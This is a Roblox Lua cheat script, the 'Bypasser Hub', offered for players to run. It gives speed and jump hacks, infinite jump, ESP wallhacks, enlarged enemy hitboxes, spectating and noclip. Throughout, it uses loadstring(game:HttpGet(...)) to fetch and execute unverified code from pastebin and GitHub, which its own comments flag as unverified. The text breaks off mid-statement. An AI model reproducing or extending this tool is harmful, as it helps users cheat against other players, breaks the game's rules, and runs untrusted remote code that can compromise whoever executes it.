Library = loadstring(game:HttpGet("https://pastebin.com/raw/Q69rcHsK"))() local Window = Library.CreateLib("Bypasser Hub", "Ocean") --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] -- Gui to Lua -- Version: 3.2 -- Instances: local s9HSkVv1l1xazfli = Instance.new("ScreenGui") local Frame = Instance.new("Frame") local UICorner = Instance.new("UICorner") local Frame_2 = Instance.new("Frame") local UICorner_2 = Instance.new("UICorner") local idk = Instance.new("TextLabel") local UIGradient = Instance.new("UIGradient") local DropShadowHolder = Instance.new("Frame") local DropShadow = Instance.new("ImageLabel") local DropShadowHolder_2 = Instance.new("Frame") local DropShadow_2 = Instance.new("ImageLabel") --Properties: s9HSkVv1l1xazfli.Name = "s9HSkVv1l1xazfli" s9HSkVv1l1xazfli.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") s9HSkVv1l1xazfli.ZIndexBehavior = Enum.ZIndexBehavior.Sibling s9HSkVv1l1xazfli.ResetOnSpawn = false Frame.Parent = s9HSkVv1l1xazfli Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Frame.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame.BorderSizePixel = 0 Frame.Position = UDim2.new(0.0086767897, 0, 0.0897435918, 0) Frame.Size = UDim2.new(0, 198, 0, 96) UICorner.Parent = Frame Frame_2.Parent = Frame Frame_2.BackgroundColor3 = Color3.fromRGB(11, 6, 140) Frame_2.BorderColor3 = Color3.fromRGB(0, 0, 0) Frame_2.BorderSizePixel = 0 Frame_2.Position = UDim2.new(0.0365717337, 0, 0.0929487571, 0) Frame_2.Size = UDim2.new(0, 182, 0, 78) UICorner_2.Parent = Frame_2 idk.Name = "idk" idk.Parent = Frame_2 idk.BackgroundColor3 = Color3.fromRGB(255, 255, 255) idk.BackgroundTransparency = 1.000 idk.BorderColor3 = Color3.fromRGB(0, 0, 0) idk.BorderSizePixel = 0 idk.Position = UDim2.new(-4.19197512e-08, 0, 0, 0) idk.Size = UDim2.new(0, 182, 0, 78) idk.Font = Enum.Font.FredokaOne idk.Text = "Bypasser Hub" -- Change if you want idk.TextColor3 = Color3.fromRGB(255, 255, 255) idk.TextScaled = true idk.TextSize = 14.000 idk.TextWrapped = true UIGradient.Color = ColorSequence.new{ColorSequenceKeypoint.new(0.00, Color3.fromRGB(0, 255, 157)), ColorSequenceKeypoint.new(0.10, Color3.fromRGB(12, 109, 66)), ColorSequenceKeypoint.new(1.00, Color3.fromRGB(255, 0, 0))} UIGradient.Parent = idk DropShadowHolder.Name = "DropShadowHolder" DropShadowHolder.Parent = Frame_2 DropShadowHolder.BackgroundTransparency = 1.000 DropShadowHolder.BorderSizePixel = 0 DropShadowHolder.Size = UDim2.new(1, 0, 1, 0) DropShadowHolder.ZIndex = 0 DropShadow.Name = "DropShadow" DropShadow.Parent = DropShadowHolder DropShadow.AnchorPoint = Vector2.new(0.5, 0.5) DropShadow.BackgroundTransparency = 1.000 DropShadow.BorderSizePixel = 0 DropShadow.Position = UDim2.new(0.5, 0, 0.5, 0) DropShadow.Size = UDim2.new(1, 47, 1, 47) DropShadow.ZIndex = 0 DropShadow.Image = "rbxassetid://6015897843" DropShadow.ImageColor3 = Color3.fromRGB(0, 0, 0) DropShadow.ImageTransparency = 0.500 DropShadow.ScaleType = Enum.ScaleType.Slice DropShadow.SliceCenter = Rect.new(49, 49, 450, 450) DropShadowHolder_2.Name = "DropShadowHolder" DropShadowHolder_2.Parent = Frame DropShadowHolder_2.BackgroundTransparency = 1.000 DropShadowHolder_2.BorderSizePixel = 0 DropShadowHolder_2.Size = UDim2.new(1, 0, 1, 0) DropShadowHolder_2.ZIndex = 0 DropShadow_2.Name = "DropShadow" DropShadow_2.Parent = DropShadowHolder_2 DropShadow_2.AnchorPoint = Vector2.new(0.5, 0.5) DropShadow_2.BackgroundTransparency = 1.000 DropShadow_2.BorderSizePixel = 0 DropShadow_2.Position = UDim2.new(0.5, 0, 0.5, 0) DropShadow_2.Size = UDim2.new(1, 47, 1, 47) DropShadow_2.ZIndex = 0 DropShadow_2.Image = "rbxassetid://6015897843" DropShadow_2.ImageColor3 = Color3.fromRGB(0, 0, 0) DropShadow_2.ImageTransparency = 0.500 DropShadow_2.ScaleType = Enum.ScaleType.Slice DropShadow_2.SliceCenter = Rect.new(49, 49, 450, 450) local NotificationBindable = Instance.new("BindableFunction") NotificationBindable.OnInvoke = callback -- game.StarterGui:SetCore("SendNotification", { Title = "Welcome To Bypasser Hub"; Text = "Made By vxhub_1"; Icon = ""; Duration = 100; Button1 = "Thank you"; Callback = NotificationBindable; }) local function callback(Text) if Text == "Button1 text" then print ("Answer") elseif Text == ("Button2 text") then print ("Answer2") end end local NotificationBindable = Instance.new("BindableFunction") NotificationBindable.OnInvoke = callback -- game.StarterGui:SetCore("SendNotification", { Title = "Bug Found!"; Text = "Some Scripts Might Not Work Because They Old"; Icon = ""; Duration = 100; Button1 = "dang im sad"; Callback = NotificationBindable; }) local function callback(Text) if Text == "Button1 text" then print ("Answer") elseif Text == ("Button2 text") then print ("Answer2") end end local ScreenGui = Instance.new("ScreenGui") ScreenGui.Name = "ScreenGui" ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") ScreenGui.ResetOnSpawn = false local Toggle = Instance.new("TextButton") Toggle.Name = "Open/Close" Toggle.Parent = ScreenGui Toggle.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Toggle.Position = UDim2.new(0, 0, 0.454706937, 0) Toggle.Size = UDim2.new(0, 90, 0, 38) Toggle.Font = Enum.Font.SourceSans Toggle.Text = "Open/Close" Toggle.TextColor3 = Color3.fromRGB(248, 248, 248) Toggle.TextSize = 22.000 Toggle.Draggable = true Toggle.MouseButton1Click:connect(function() Library:ToggleUI() end) local Corner = Instance.new("UICorner") Corner.Name = "Corner" Corner.Parent = Toggle local Tab = Window:NewTab("infos") local Section = Tab:NewSection("These Are script things") Section:NewLabel("This script Has onlyn 1 Tester") Section:NewLabel("[WHITELISTED]") Section:NewLabel("This Script Has Dev Too Its micro_script") Section:NewLabel("Thank You For Supporting") local Tab = Window:NewTab("👤Player") local Section = Tab:NewSection("Player") Section:NewSlider("Speed Increaser", "Increase ur speed", 500, 0, function(s) -- 500 (MaxValue) | 0 (MinValue) game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = s end) Section:NewSlider("Increase JumpPower", "jump high fr", 500, 0, function(s) -- 500 (MaxValue) | 0 (MinValue) game.Players.LocalPlayer.Character.Humanoid.JumpPower = s end) Section:NewToggle("Fov Increaser (forever)", "lets you make fov higher", function(state) if state then local FovNumber = 120 --Enter your FOV number here local Camera = workspace.CurrentCamera Camera.FieldOfView = FovNumber end end) Section:NewButton("Infinite Jump", "Nah Id Jump", function() local InfiniteJumpEnabled = true game:GetService("UserInputService").JumpRequest:connect(function() if InfiniteJumpEnabled then game:GetService"Players".LocalPlayer.Character:FindFirstChildOfClass'Humanoid':ChangeState("Jumping") end end) end) Section:NewButton("Ping And Fps Counter", "count fps", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] repeat wait() until game:IsLoaded() wait(2) local ScreenGui = Instance.new("ScreenGui") local Fps = Instance.new("TextLabel") local Ping = Instance.new("TextLabel") --Properties: ScreenGui.Parent = game.CoreGui ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Fps.Name = "Fps" Fps.Parent = ScreenGui Fps.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Fps.BackgroundTransparency = 1.000 Fps.Position = UDim2.new(0.786138654, 0, 0, 0) Fps.Size = UDim2.new(0, 125, 0, 25) Fps.Font = Enum.Font.SourceSans Fps.TextColor3 = Color3.fromRGB(255, 255, 255) Fps.TextScaled = true Fps.TextSize = 14.000 Fps.TextWrapped = true Ping.Name = "Ping" Ping.Parent = ScreenGui Ping.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Ping.BackgroundTransparency = 1.000 Ping.BorderColor3 = Color3.fromRGB(255, 255, 255) Ping.Position = UDim2.new(0.700000048, 0, 0, 0) Ping.Size = UDim2.new(0, 125, 0, 25) Ping.Font = Enum.Font.SourceSans Ping.TextColor3 = Color3.fromRGB(253, 253, 253) Ping.TextScaled = true Ping.TextSize = 14.000 Ping.TextWrapped = true -- Scripts: local script = Instance.new('LocalScript', Fps) local RunService = game:GetService("RunService") RunService.RenderStepped:Connect(function(frame) -- This will fire every time a frame is rendered script.Parent.Text = ("FPS: "..math.round(1/frame)) end) local script = Instance.new('LocalScript', Ping) local RunService = game:GetService("RunService") RunService.RenderStepped:Connect(function(ping) script.Parent.Text = ("Ping: " ..game:GetService("Stats").Network.ServerStatsItem["Data Ping"]:GetValueString(math.round(2/ping))) -- your ping end) end) Section:NewButton("Speed And JumpPower Gui", "jump and speed", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] --Created By DariuZzZ-- local Hacks = Instance.new("ScreenGui") local Background = Instance.new("Frame") local Walkspeedlb = Instance.new("TextLabel") local jumppowerlb = Instance.new("TextLabel") local speed = Instance.new("TextLabel") local jump = Instance.new("TextLabel") local WalkBox = Instance.new("TextBox") local JumpBox = Instance.new("TextBox") local WalkSumbit = Instance.new("TextButton") local JumpSumbit = Instance.new("TextButton") local TextLabel = Instance.new("TextLabel") local Open = Instance.new("TextButton") --Properties: Hacks.Name = "Hacks" Hacks.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") Hacks.ZIndexBehavior = Enum.ZIndexBehavior.Sibling Background.Name = "Background" Background.Parent = Hacks Background.BackgroundColor3 = Color3.new(0, 0, 0) Background.BackgroundTransparency = 0.40000000596046 Background.Position = UDim2.new(0.109510086, 0, 0.381112367, 0) Background.Size = UDim2.new(0.222958699, 0, 0.476163864, 0) Background.Visible = false Walkspeedlb.Name = "Walkspeedlb" Walkspeedlb.Parent = Background Walkspeedlb.BackgroundColor3 = Color3.new(1, 1, 1) Walkspeedlb.BackgroundTransparency = 1 Walkspeedlb.Position = UDim2.new(0, 0, 0.122436516, 0) Walkspeedlb.Size = UDim2.new(0.999999762, 0, 0.100000001, 0) Walkspeedlb.Visible = false Walkspeedlb.Font = Enum.Font.SourceSans Walkspeedlb.Text = "WalkSpeed:" Walkspeedlb.TextColor3 = Color3.new(1, 1, 1) Walkspeedlb.TextScaled = true Walkspeedlb.TextSize = 14 Walkspeedlb.TextWrapped = true Walkspeedlb.TextXAlignment = Enum.TextXAlignment.Left jumppowerlb.Name = "jumppowerlb" jumppowerlb.Parent = Background jumppowerlb.BackgroundColor3 = Color3.new(1, 1, 1) jumppowerlb.BackgroundTransparency = 1 jumppowerlb.Position = UDim2.new(0, 0, 0.2203857, 0) jumppowerlb.Size = UDim2.new(0.999999762, 0, 0.100000001, 0) jumppowerlb.Visible = false jumppowerlb.Font = Enum.Font.SourceSans jumppowerlb.Text = "Jump Power:" jumppowerlb.TextColor3 = Color3.new(1, 1, 1) jumppowerlb.TextScaled = true jumppowerlb.TextSize = 14 jumppowerlb.TextWrapped = true jumppowerlb.TextXAlignment = Enum.TextXAlignment.Left speed.Name = "speed" speed.Parent = Background speed.BackgroundColor3 = Color3.new(1, 1, 1) speed.BackgroundTransparency = 1 speed.Position = UDim2.new(0.577337444, 0, 0.122436516, 0) speed.Size = UDim2.new(0.422662586, 0, 0.100000001, 0) speed.Visible = false speed.Font = Enum.Font.SourceSans speed.Text = "Default" speed.TextColor3 = Color3.new(1, 1, 1) speed.TextScaled = true speed.TextSize = 14 speed.TextWrapped = true jump.Name = "jump" jump.Parent = Background jump.BackgroundColor3 = Color3.new(1, 1, 1) jump.BackgroundTransparency = 1 jump.Position = UDim2.new(0.659198582, 0, 0.22038573, 0) jump.Size = UDim2.new(0.340801179, 0, 0.100000001, 0) jump.Visible = false jump.Font = Enum.Font.SourceSans jump.Text = "Default" jump.TextColor3 = Color3.new(1, 1, 1) jump.TextScaled = true jump.TextSize = 14 jump.TextWrapped = true WalkBox.Name = "WalkBox" WalkBox.Parent = Background WalkBox.BackgroundColor3 = Color3.new(0.333333, 0.333333, 0.333333) WalkBox.BackgroundTransparency = 0.5 WalkBox.BorderSizePixel = 0 WalkBox.Position = UDim2.new(0, 0, 0.174571082, 0) WalkBox.Size = UDim2.new(0.999999881, 0, 0.187969327, 0) WalkBox.Font = Enum.Font.SourceSans WalkBox.PlaceholderColor3 = Color3.new(1, 1, 1) WalkBox.PlaceholderText = "Insert a number for walk speed" WalkBox.Text = "" WalkBox.TextColor3 = Color3.new(1, 1, 1) WalkBox.TextScaled = true WalkBox.TextSize = 14 WalkBox.TextWrapped = true JumpBox.Name = "JumpBox" JumpBox.Parent = Background JumpBox.BackgroundColor3 = Color3.new(0.333333, 0.333333, 0.333333) JumpBox.BackgroundTransparency = 0.5 JumpBox.BorderSizePixel = 0 JumpBox.Position = UDim2.new(0.00430848775, 0, 0.6280002, 0) JumpBox.Size = UDim2.new(0.999999881, 0, 0.190235019, 0) JumpBox.Font = Enum.Font.SourceSans JumpBox.PlaceholderColor3 = Color3.new(1, 1, 1) JumpBox.PlaceholderText = "Insert a number for jump power" JumpBox.Text = "" JumpBox.TextColor3 = Color3.new(1, 1, 1) JumpBox.TextScaled = true JumpBox.TextSize = 14 JumpBox.TextWrapped = true WalkSumbit.Name = "WalkSumbit" WalkSumbit.Parent = Background WalkSumbit.BackgroundColor3 = Color3.new(0.0980392, 1, 0) WalkSumbit.Position = UDim2.new(0.00430848775, 0, 0.402936816, 0) WalkSumbit.Size = UDim2.new(0.995691121, 0, 0.155913889, 0) WalkSumbit.Font = Enum.Font.SourceSans WalkSumbit.Text = "Sumbit" WalkSumbit.TextColor3 = Color3.new(0, 0, 0) WalkSumbit.TextScaled = true WalkSumbit.TextSize = 14 WalkSumbit.TextWrapped = true JumpSumbit.Name = "JumpSumbit" JumpSumbit.Parent = Background JumpSumbit.BackgroundColor3 = Color3.new(0.0980392, 1, 0) JumpSumbit.Position = UDim2.new(0, 0, 0.84706986, 0) JumpSumbit.Size = UDim2.new(0.995691121, 0, 0.151039571, 0) JumpSumbit.Font = Enum.Font.SourceSans JumpSumbit.Text = "Sumbit" JumpSumbit.TextColor3 = Color3.new(0, 0, 0) JumpSumbit.TextScaled = true JumpSumbit.TextSize = 14 JumpSumbit.TextWrapped = true TextLabel.Parent = Background TextLabel.BackgroundColor3 = Color3.new(1, 1, 1) TextLabel.BackgroundTransparency = 1 TextLabel.Size = UDim2.new(0.995690882, 0, 0.135462731, 0) TextLabel.Font = Enum.Font.SourceSans TextLabel.Text = "Created By DariuZzZ" TextLabel.TextColor3 = Color3.new(1, 1, 1) TextLabel.TextScaled = true TextLabel.TextSize = 14 TextLabel.TextWrapped = true Open.Name = "Open" Open.Parent = Hacks Open.BackgroundColor3 = Color3.new(0, 0, 0) Open.BackgroundTransparency = 0.44999998807907 Open.Position = UDim2.new(0, 0, 0.756052136, 0) Open.Size = UDim2.new(0.100000001, 0, 0.0553072728, 0) Open.Font = Enum.Font.SourceSans Open.Text = "Open" Open.TextColor3 = Color3.new(1, 1, 1) Open.TextScaled = true Open.TextSize = 14 Open.TextWrapped = true -- Scripts: local playername = game.Players.LocalPlayer.Name local player = game.Players.LocalPlayer local character = game.Workspace[playername] local Background = player.PlayerGui.Hacks.Background Open.MouseButton1Click:Connect(function() if game.Players.LocalPlayer.PlayerGui.Hacks.Background.Visible == true then game.Players.LocalPlayer.PlayerGui.Hacks.Open.Text = "Open" game.Players.LocalPlayer.PlayerGui.Hacks.Background.Visible = false else game.Players.LocalPlayer.PlayerGui.Hacks.Open.Text = "Close" game.Players.LocalPlayer.PlayerGui.Hacks.Background.Visible = true end end) WalkSumbit.MouseButton1Click:connect(function() character.Humanoid.WalkSpeed = tostring(Background.WalkBox.Text) end) JumpSumbit.MouseButton1Click:connect(function() character.Humanoid.JumpPower = tostring(Background.JumpBox.Text) end) end) Section:NewLabel("Useful") Section:NewButton("Esp", "esp player", function() _G.FriendColor = Color3.fromRGB(0, 0, 255) _G.EnemyColor = Color3.fromRGB(255, 0, 0) _G.UseTeamColor = true -------------------------------------------------------------------- local Holder = Instance.new("Folder", game.CoreGui) Holder.Name = "ESP" local Box = Instance.new("BoxHandleAdornment") Box.Name = "nilBox" Box.Size = Vector3.new(1, 2, 1) Box.Color3 = Color3.new(100 / 255, 100 / 255, 100 / 255) Box.Transparency = 0.7 Box.ZIndex = 0 Box.AlwaysOnTop = false Box.Visible = false local NameTag = Instance.new("BillboardGui") NameTag.Name = "nilNameTag" NameTag.Enabled = false NameTag.Size = UDim2.new(0, 200, 0, 50) NameTag.AlwaysOnTop = true NameTag.StudsOffset = Vector3.new(0, 1.8, 0) local Tag = Instance.new("TextLabel", NameTag) Tag.Name = "Tag" Tag.BackgroundTransparency = 1 Tag.Position = UDim2.new(0, -50, 0, 0) Tag.Size = UDim2.new(0, 300, 0, 20) Tag.TextSize = 15 Tag.TextColor3 = Color3.new(100 / 255, 100 / 255, 100 / 255) Tag.TextStrokeColor3 = Color3.new(0 / 255, 0 / 255, 0 / 255) Tag.TextStrokeTransparency = 0.4 Tag.Text = "nil" Tag.Font = Enum.Font.SourceSansBold Tag.TextScaled = false local LoadCharacter = function(v) repeat wait() until v.Character ~= nil v.Character:WaitForChild("Humanoid") local vHolder = Holder:FindFirstChild(v.Name) vHolder:ClearAllChildren() local b = Box:Clone() b.Name = v.Name .. "Box" b.Adornee = v.Character b.Parent = vHolder local t = NameTag:Clone() t.Name = v.Name .. "NameTag" t.Enabled = true t.Parent = vHolder t.Adornee = v.Character:WaitForChild("Head", 5) if not t.Adornee then return UnloadCharacter(v) end t.Tag.Text = v.Name b.Color3 = Color3.new(v.TeamColor.r, v.TeamColor.g, v.TeamColor.b) t.Tag.TextColor3 = Color3.new(v.TeamColor.r, v.TeamColor.g, v.TeamColor.b) local Update local UpdateNameTag = function() if not pcall(function() v.Character.Humanoid.DisplayDistanceType = Enum.HumanoidDisplayDistanceType.None local maxh = math.floor(v.Character.Humanoid.MaxHealth) local h = math.floor(v.Character.Humanoid.Health) end) then Update:Disconnect() end end UpdateNameTag() Update = v.Character.Humanoid.Changed:Connect(UpdateNameTag) end local UnloadCharacter = function(v) local vHolder = Holder:FindFirstChild(v.Name) if vHolder and (vHolder:FindFirstChild(v.Name .. "Box") ~= nil or vHolder:FindFirstChild(v.Name .. "NameTag") ~= nil) then vHolder:ClearAllChildren() end end local LoadPlayer = function(v) local vHolder = Instance.new("Folder", Holder) vHolder.Name = v.Name v.CharacterAdded:Connect(function() pcall(LoadCharacter, v) end) v.CharacterRemoving:Connect(function() pcall(UnloadCharacter, v) end) v.Changed:Connect(function(prop) if prop == "TeamColor" then UnloadCharacter(v) wait() LoadCharacter(v) end end) LoadCharacter(v) end local UnloadPlayer = function(v) UnloadCharacter(v) local vHolder = Holder:FindFirstChild(v.Name) if vHolder then vHolder:Destroy() end end for i,v in pairs(game:GetService("Players"):GetPlayers()) do spawn(function() pcall(LoadPlayer, v) end) end game:GetService("Players").PlayerAdded:Connect(function(v) pcall(LoadPlayer, v) end) game:GetService("Players").PlayerRemoving:Connect(function(v) pcall(UnloadPlayer, v) end) game:GetService("Players").LocalPlayer.NameDisplayDistance = 0 if _G.Reantheajfdfjdgs then return end _G.Reantheajfdfjdgs = ":suifayhgvsdghfsfkajewfrhk321rk213kjrgkhj432rj34f67df" local players = game:GetService("Players") local plr = players.LocalPlayer function esp(target, color) if target.Character then if not target.Character:FindFirstChild("GetReal") then local highlight = Instance.new("Highlight") highlight.RobloxLocked = true highlight.Name = "GetReal" highlight.Adornee = target.Character highlight.DepthMode = Enum.HighlightDepthMode.AlwaysOnTop highlight.FillColor = color highlight.Parent = target.Character else target.Character.GetReal.FillColor = color end end end while task.wait() do for i, v in pairs(players:GetPlayers()) do if v ~= plr then esp(v, _G.UseTeamColor and v.TeamColor.Color or ((plr.TeamColor == v.TeamColor) and _G.FriendColor or _G.EnemyColor)) end end end end) Section:NewButton("Hitbox (high)", "expand", function() _G.HeadSize = 50 _G.Disabled = true game:GetService('RunService').RenderStepped:connect(function() if _G.Disabled then for i,v in next, game:GetService('Players'):GetPlayers() do if v.Name ~= game:GetService('Players').LocalPlayer.Name then pcall(function() v.Character.HumanoidRootPart.Size = Vector3.new(_G.HeadSize,_G.HeadSize,_G.HeadSize) v.Character.HumanoidRootPart.Transparency = 0.7 v.Character.HumanoidRootPart.BrickColor = BrickColor.new("Really blue") v.Character.HumanoidRootPart.Material = "Neon" v.Character.HumanoidRootPart.CanCollide = false end) end end end end) end) Section:NewButton("Invisible", "invisible really", function() loadstring(game:HttpGet('https://pastebin.com/raw/3Rnd9rHf'))() end) Section:NewLabel("others") Section:NewButton("Walk On Wall", "walls", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/sinret/rbxscript.com-scripts-reuploads-/main/WalkOnWalls", true))() end) Section:NewButton("Radar", "opens radar", function() --- Drawing Player Radar --- Made by topit _G.RadarSettings = { --- Radar settings RADAR_LINES = true; -- Displays distance rings + cardinal lines RADAR_LINE_DISTANCE = 50; -- The distance between each distance ring RADAR_SCALE = 1; -- Controls how "zoomed in" the radar display is RADAR_RADIUS = 125; -- The size of the radar itself RADAR_ROTATION = true; -- Toggles radar rotation. Looks kinda trippy when disabled SMOOTH_ROT = true; -- Toggles smooth radar rotation SMOOTH_ROT_AMNT = 30; -- Lower number is smoother, higher number is snappier CARDINAL_DISPLAY = true; -- Displays the four cardinal directions (north east south west) around the radar --- Marker settings DISPLAY_OFFSCREEN = true; -- Displays offscreen / off-radar markers DISPLAY_TEAMMATES = true; -- Displays markers that belong to your teammates DISPLAY_TEAM_COLORS = true; -- Displays your teammates markers with either a custom color (change Team_Marker) or with that teams TeamColor (enable USE_TEAM_COLORS) DISPLAY_FRIEND_COLORS = true; -- Displays your friends markers with a custom color (Friend_Marker). This takes priority over DISPLAY_TEAM_COLORS and DISPLAY_RGB DISPLAY_RGB_COLORS = false; -- Displays each marker with an RGB cycle. Takes priority over DISPLAY_TEAM_COLORS, but not DISPLAY_FRIEND_COLORS MARKER_SCALE_BASE = 1.25; -- Base scale that gets applied to markers MARKER_SCALE_MAX = 1.25; -- The largest scale that a marker can be MARKER_SCALE_MIN = 0.75; -- The smallest scale that a marker can be MARKER_FALLOFF = true; -- Affects the markers' scale depending on how far away the player is - bypasses SCALE_MIN and SCALE_MAX MARKER_FALLOFF_AMNT = 125; -- How close someone has to be for falloff to start affecting them OFFSCREEN_TRANSPARENCY = 0.3; -- Transparency of offscreen markers USE_FALLBACK = false; -- Enables an emergency "fallback mode" for StreamingEnabled games USE_QUADS = true; -- Displays radar markers as arrows instead of dots USE_TEAM_COLORS = false; -- Uses a team's TeamColor for marker colors VISIBLITY_CHECK = false; -- Makes markers that are not visible slightly transparent --- Theme RADAR_THEME = { Outline = Color3.fromRGB(35, 35, 45); -- Radar outline Background = Color3.fromRGB(25, 25, 35); -- Radar background DragHandle = Color3.fromRGB(50, 50, 255); -- Drag handle Cardinal_Lines = Color3.fromRGB(110, 110, 120); -- Color of the horizontal and vertical lines Distance_Lines = Color3.fromRGB(65, 65, 75); -- Color of the distance rings Generic_Marker = Color3.fromRGB(255, 25, 115); -- Color of a player marker without a team Local_Marker = Color3.fromRGB(115, 25, 255); -- Color of your marker, regardless of team Team_Marker = Color3.fromRGB(25, 115, 255); -- Color of your teammates markers. Used when DISPLAY_TEAM_COLORS is disabled Friend_Marker = Color3.fromRGB(25, 255, 115); -- Color of your friends markers. Used when DISPLAY_FRIEND_COLORS is enabled }; } loadstring(game:HttpGet('https://raw.githubusercontent.com/topitbopit/stuff/main/PlayerRadar/source.lua'))() end) Section:NewButton("Hide All Players", "hide", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet('https://pastebin.com/raw/3GmjuySP'))() end) Section:NewButton("Freeze", "freeze real", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] loadstring(game:HttpGet("https://raw.githubusercontent.com/SavaLava9/FEFreeze/main/FEFreeze.txt"))() end) Section:NewButton("Spectate Gui ", "ButtonInfo", function() -- Gui to Lua -- Version: 3.2 -- Instances: local SpectateGui = Instance.new("ScreenGui") local Spectate = Instance.new("TextButton") local SpectateWindow = Instance.new("TextLabel") local Main = Instance.new("TextLabel") local Text = Instance.new("TextLabel") local Name = Instance.new("TextLabel") local Right = Instance.new("TextButton") local Left = Instance.new("TextButton") --Properties: SpectateGui.Name = "SpectateGui" SpectateGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") Spectate.Name = "Spectate" Spectate.Parent = SpectateGui Spectate.BackgroundColor3 = Color3.fromRGB(51, 191, 255) Spectate.BorderColor3 = Color3.fromRGB(0, 0, 0) Spectate.BorderSizePixel = 2 Spectate.Position = UDim2.new(0, 3, 0, 250) Spectate.Size = UDim2.new(0, 100, 0, 40) Spectate.ZIndex = 2 Spectate.Font = Enum.Font.SourceSans Spectate.Text = "Spectate" Spectate.TextColor3 = Color3.fromRGB(0, 0, 0) Spectate.TextScaled = true Spectate.TextSize = 14.000 Spectate.TextWrapped = true SpectateWindow.Name = "SpectateWindow" SpectateWindow.Parent = SpectateGui SpectateWindow.BackgroundColor3 = Color3.fromRGB(255, 255, 255) SpectateWindow.BackgroundTransparency = 1.000 SpectateWindow.Size = UDim2.new(1, 0, 1, 0) SpectateWindow.Visible = false SpectateWindow.Font = Enum.Font.SourceSans SpectateWindow.Text = "" SpectateWindow.TextSize = 14.000 Main.Name = "Main" Main.Parent = SpectateWindow Main.BackgroundColor3 = Color3.fromRGB(0, 170, 255) Main.Position = UDim2.new(0, 0, 1, -80) Main.Size = UDim2.new(1, 0, 0, 80) Main.Font = Enum.Font.SourceSans Main.Text = "" Main.TextSize = 14.000 Text.Name = "Text" Text.Parent = Main Text.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Text.BackgroundTransparency = 1.000 Text.Position = UDim2.new(0.5, -298, 0, 0) Text.Size = UDim2.new(0, 597, 0, 25) Text.Font = Enum.Font.SourceSans Text.Text = "ur stalking" Text.TextColor3 = Color3.fromRGB(255, 255, 255) Text.TextScaled = true Text.TextSize = 14.000 Text.TextStrokeTransparency = 0.000 Text.TextWrapped = true Name.Name = "Name" Name.Parent = Main Name.BackgroundColor3 = Color3.fromRGB(255, 255, 255) Name.BackgroundTransparency = 1.000 Name.Position = UDim2.new(0.5, -250, 1, -50) Name.Size = UDim2.new(0, 500, 0, 50) Name.Font = Enum.Font.SourceSans Name.Text = "" Name.TextColor3 = Color3.fromRGB(255, 170, 0) Name.TextScaled = true Name.TextSize = 14.000 Name.TextStrokeTransparency = 0.000 Name.TextWrapped = true Right.Name = "Right" Right.Parent = Main Right.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Right.BorderColor3 = Color3.fromRGB(255, 0, 0) Right.BorderSizePixel = 3 Right.Position = UDim2.new(0.800000012, 0, 0.5, -25) Right.Size = UDim2.new(0, 50, 0, 50) Right.ZIndex = 2 Right.Font = Enum.Font.SourceSans Right.Text = ">" Right.TextColor3 = Color3.fromRGB(255, 255, 255) Right.TextSize = 60.000 Left.Name = "Left" Left.Parent = Main Left.BackgroundColor3 = Color3.fromRGB(0, 0, 0) Left.BorderColor3 = Color3.fromRGB(255, 0, 0) Left.BorderSizePixel = 3 Left.Position = UDim2.new(0.150000006, 0, 0.5, -25) Left.Size = UDim2.new(0, 50, 0, 50) Left.ZIndex = 2 Left.Font = Enum.Font.SourceSans Left.Text = "<" Left.TextColor3 = Color3.fromRGB(255, 255, 255) Left.TextSize = 60.000 -- Scripts: local function WUORLWK_fake_script() -- SpectateGui.SpectatingScript local script = Instance.new('LocalScript', SpectateGui) local gui = script.Parent local player = game.Players.LocalPlayer local cam = game.Workspace.CurrentCamera local spectateB = gui:WaitForChild("Spectate") local spectateW = gui:WaitForChild("SpectateWindow") local main = spectateW:WaitForChild("Main") local name = main:WaitForChild("Name") local number = 1 spectateB.MouseButton1Down:connect(function() if spectateW.Visible == false then spectateW.Visible = true spectateB.Text = "Stop Spectating" for index, players in pairs(game.Players:GetPlayers()) do if number == index then local character = game.Workspace:WaitForChild(players.Name) cam.CameraSubject = character.Head name.Text = cam.CameraSubject.Parent.Name end end cam.CameraType = "Follow" else spectateW.Visible = false spectateB.Text = "Spectate" cam.CameraSubject = player.Character:FindFirstChild("Humanoid") cam.CameraType = "Custom" end end) local left = main:WaitForChild("Left") local right = main:WaitForChild("Right") right.MouseButton1Down:connect(function() if number == #game.Players:GetPlayers() then number = 1 else number = number + 1 end for index, players in pairs(game.Players:GetPlayers()) do if number == index then local character = game.Workspace:WaitForChild(players.Name) cam.CameraSubject = character.Head name.Text = cam.CameraSubject.Parent.Name end end end) left.MouseButton1Down:connect(function() if number == 1 then number = #game.Players:GetPlayers() else number = number - 1 end for index, players in pairs(game.Players:GetPlayers()) do if number == index then local character = game.Workspace:WaitForChild(players.Name) cam.CameraSubject = character.Head name.Text = cam.CameraSubject.Parent.Name end end end) main:WaitForChild("GetModel").MouseButton1Down:connect(function() game:service("MarketplaceService"):PromptPurchase(player, 331901306) end) end coroutine.wrap(WUORLWK_fake_script)() local function ASUTUK_fake_script() -- nil.NameScript local script = Instance.new('Script', nil) script.Parent.Name = "SpectateGui" end coroutine.wrap(ASUTUK_fake_script)() end) Section:NewButton("Noclip Gui", "noclip real", function() --[[ WARNING: Heads up! This script has not been verified by ScriptBlox. Use at your own risk! ]] local Workspace = game:GetService("Workspace") local CoreGui = game:GetService("CoreGui") local Players = game:GetService("Players") local UserInputService = game:GetService("UserInputService") local RunService = game:GetService("RunService") local TweenService = game:GetService("TweenService") local Noclip = Instance.new("ScreenGui") local BG = 